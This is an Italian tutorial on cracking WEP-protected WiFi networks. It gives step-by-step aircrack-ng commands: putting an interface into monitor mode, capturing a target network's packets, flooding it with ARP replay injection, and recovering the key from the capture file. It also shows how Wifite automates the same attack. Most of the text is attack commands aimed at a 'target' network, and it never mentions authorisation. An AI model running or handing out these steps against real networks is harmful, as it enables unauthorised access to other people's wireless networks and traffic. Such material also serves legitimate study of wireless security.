tags: WEP_Hacking Hacking_WiFi Wifite airmon_ng
Il protocollo WEP (Wired Equivalent Privacy) è noto per le sue vulnerabilità e oggi è considerato obsoleto. Per ottenere la chiave ci mettiamo in modalità monitor, vediamo le informazioni del bersaglio, mandiamo un sacco di pacchetti a quel WiFi che catturiamo a nostra volta e infine crackiamo la password prorpio grazie al file che abbiamo utilizzato per catturare tutti i pacchetti.
Airmon-ng
Modalità Monitor
iwconfig #Identifica la tua interfaccia di rete
airmon-ng start wlan0 #Metti l'interfaccia di rete in modalità monitor
airodump-ng wlan0mon #Monitora le reti nelle vicinanze
Cattura pacchetti
airodump-ng --bssid <BSSID> --channel <CANALE> --write capture wlan0mon
#Oppure:
airodump-ng -c <canale> --bssid <BSSID> -w wep_capture wlan0mon
- Sostituisci
<canale>e<BSSID>con i dettagli della rete target. - L’opzione
-wsalva i pacchetti in un file.
Invio grande quantità di pacchetti
aireplay-ng --arpreplay -b <BSSID> -h <MAC_CLIENT> wlan0mon
# Oppure:
aireplay-ng -3 -b <BSSID> wlan0mon
Dopo aver catturato abbastanza pacchetti tipo tra i 10000 e 50000 possiamo craccare il file .cap che abbiamo creato all’inizio ed ottenere così la password:
aircrack-ng capture-01.cap
#Oppure
aircrack-ng -b <BSSID> wep_capture-01.cap
Se il cracking ha successo, otterrai un risultato simile a:
KEY FOUND! [ XX:XX:XX:XX:XX ]Wifite
Wifite è uno strumento che automatizza tutto il processo descritto sopra e l’utilizzo è veramente semplice, per prima cosa monitoriamo tutte le reti con il comando:
sudo wifiteDopo che abbiamo trovato il bersaglio glielo possiamo dare con il numero corrispondente dopo aver chiuso la scansione con CTRL+C
Wifite proverà in ogni modo ad ottenere le credenziali in modo automatico.